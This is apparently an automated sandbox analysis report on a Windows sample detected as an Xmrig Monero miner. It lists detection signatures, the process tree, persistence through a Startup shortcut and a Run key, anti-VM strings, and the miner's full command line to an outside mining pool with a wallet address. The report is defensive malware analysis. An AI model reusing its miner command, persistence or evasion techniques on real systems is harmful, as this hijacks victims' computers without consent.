
Windows Analysis Report
Vsob3IooE7.exe

Overview

General Information

Sample Name: Vsob3IooE7.exe
Original Sample Name: e7bf9f0c2c1977ddd8e139c13c27be0d.exe
Analysis ID: 873923
MD5: e7bf9f0c2c1977ddd8e139c13c27be0d
SHA1: e91aff3d9a8c7cef0e9543350864971e4ad93f82
SHA256: a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
Tags: 32 CoinMiner exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected AntiVM3
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Detected Stratum mining protocol
Machine Learning detection for sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Vsob3IooE7.exe (PID: 1796 cmdline: C:\Users\user\Desktop\Vsob3IooE7.exe MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 5184 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 6944 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
    • Vsob3IooE7.exe (PID: 748 cmdline: {path} MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
      • Driver.exe (PID: 6784 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
        • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Vsob3IooE7.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • Vsob3IooE7.exe (PID: 2068 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • Vsob3IooE7.exe (PID: 5176 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" MD5: E7BF9F0C2C1977DDD8E139C13C27BE0D)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: dump.pcap | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | Rule: URL_File_Local_EXE | Description: Detects an .url file that points to a local executable | Author: Florian Roth (Nextron Systems)
  • 0x0:$s1: [InternetShortcut]
  • 0x14:$s2: URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | Rule: Methodology_Suspicious_Shortcut_Local_URL | Description: Detects local script usage for .URL persistence | Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x14:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]
Source: Process Memory Space: Vsob3IooE7.exe PID: 1796 | Rule: JoeSecurity_AntiVM_3 | Description: Yara detected AntiVM_3 | Author: Joe Security
Source: Process Memory Space: Vsob3IooE7.exe PID: 748 | Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Description: Detects command line parameters often used by crypto mining software | Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: Driver.exe PID: 6784 | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

        Bitcoin Miner

Source: Process started | Author: Joe Security | Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: {path}, ParentImage: C:\Users\user\Desktop\Vsob3IooE7.exe, ParentProcessId: 748, ParentProcessName: Vsob3IooE7.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2, ProcessId: 6784, ProcessName: Driver.exe

        Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\Vsob3IooE7.exe, ProcessId: 748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
        No Snort rule has matched


        AV Detection

Source: Vsob3IooE7.exe | ReversingLabs: Detection: 21%
Source: Vsob3IooE7.exe | Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | ReversingLabs: Detection: 70%
Source: Vsob3IooE7.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Joe Sandbox ML: detected

        Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: Driver.exe PID: 6784, type: MEMORYSTR
Source: Driver.exe, 00000007.00000000.450719664.0000000140001000.00000080.00000001.01000000.0000000A.sdmp | String found in binary or memory: @cryptonight/0cn
Source: global traffic | TCP traffic: 192.168.2.5:49715 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"427x8gux5jrrgk4v7grcwk85mwpjcan7djgqbabcetdqc5bivy27pept3ctx43qmladkaardf4kw4hiozmdq7ehrnczdnfm","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}
Source: Vsob3IooE7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Vsob3IooE7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Cassa.pdb source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Cassa.pdbSHA256 source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ZMm7.pdbSHA256#:=v source: Vsob3IooE7.exe
Source: Binary string: ZMm7.pdb source: Vsob3IooE7.exe
Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h (0_2_02ECEC18)
Source: Joe Sandbox View | IP Address: 141.94.96.144
Source: global traffic | TCP traffic: 192.168.2.5:49715 -> 141.94.96.144:3333
Source: unknown | DNS traffic detected: queries for: pool.supportxmr.com
Source: Vsob3IooE7.exe, 00000000.00000002.424543381.0000000001229000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: Vsob3IooE7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Process Memory Space: Vsob3IooE7.exe PID: 748, type: MEMORYSTR | Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPED | Matched rule: URL_File_Local_EXE date = 2017-10-04, author = Florian Roth (Nextron Systems), description = Detects an .url file that points to a local executable, score = , reference = https://twitter.com/malwareforme/status/915300883012870144, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000326A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.424543381.0000000001229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000000.387255397.0000000000A92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZMm7.exe@ vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename0 vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 00000009.00000002.469097025.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exe, 0000000A.00000002.492222164.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Vsob3IooE7.exe
        Source: Vsob3IooE7.exeBinary or memory string: OriginalFilenameZMm7.exe@ vs Vsob3IooE7.exe
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
        Source: Vsob3IooE7.exeReversingLabs: Detection: 21%
        Source: Vsob3IooE7.exeVirustotal: Detection: 23%
        Source: Vsob3IooE7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\Vsob3IooE7.exe C:\Users\user\Desktop\Vsob3IooE7.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\Desktop\Vsob3IooE7.exe {path} (3 identical entries)
        Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe "C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe" (2 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\Desktop\Vsob3IooE7.exe {path} (3 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vsob3IooE7.exe.log
        Source: classification engine | Classification label: mal100.expl.evad.mine.winEXE@13/3@1/1
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: Vsob3IooE7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: Vsob3IooE7.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
        Source: Vsob3IooE7.exe | Static file information: File size 2842624 > 1048576
        Source: Vsob3IooE7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: Vsob3IooE7.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2b5600
        Source: Vsob3IooE7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Vsob3IooE7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: Cassa.pdb source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: Cassa.pdbSHA256 source: Vsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.430553510.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.574629753.0000000005A00000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: ZMm7.pdbSHA256#:=v source: Vsob3IooE7.exe
        Source: Binary string: ZMm7.pdb source: Vsob3IooE7.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Code function: 0_2_02EC086C pushad ; iretd 0_2_02EC086D
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Code function: 0_2_02EC8D7C pushfd ; ret 0_2_02EC8D85
        Source: Driver.exe.5.dr | Static PE information: section name: .MPRESS1
        Source: Driver.exe.5.dr | Static PE information: section name: .MPRESS2
        Source: initial sample | Static PE information: section where entry point is pointing to: .MPRESS2
        Source: Driver.exe.5.dr | Static PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
        Source: Vsob3IooE7.exe | Static PE information: real checksum: 0x0 should be: 0x2c0932
        Source: Vsob3IooE7.exe | Static PE information: 0xA019F57F [Fri Feb 12 14:36:47 2055 UTC]
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | File created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url (2 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Driver (2 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process information set: NOOPENFILEERRORBOX (58 identical entries)
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe | Process information set: NOOPENFILEERRORBOX (21 identical entries)
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe | Process information set: NOOPENFILEERRORBOX (11 identical entries)

        Malware Analysis System Evasion

        Source: Yara match | File source: Process Memory Space: Vsob3IooE7.exe PID: 1796, type: MEMORYSTR
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe TID: 7152 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Thread delayed: delay time: 922337203685477
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
        Source: Vsob3IooE7.exe, 00000005.00000003.807995083.0000000001476000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c-
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
        Source: Vsob3IooE7.exe, 00000000.00000002.430553510.000000000325D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process token adjusted: Debug (2 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Memory written: C:\Users\user\Desktop\Vsob3IooE7.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\Desktop\Vsob3IooE7.exe {path} (3 identical entries)
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Users\user\Desktop\Vsob3IooE7.exe VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Vsob3IooE7.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
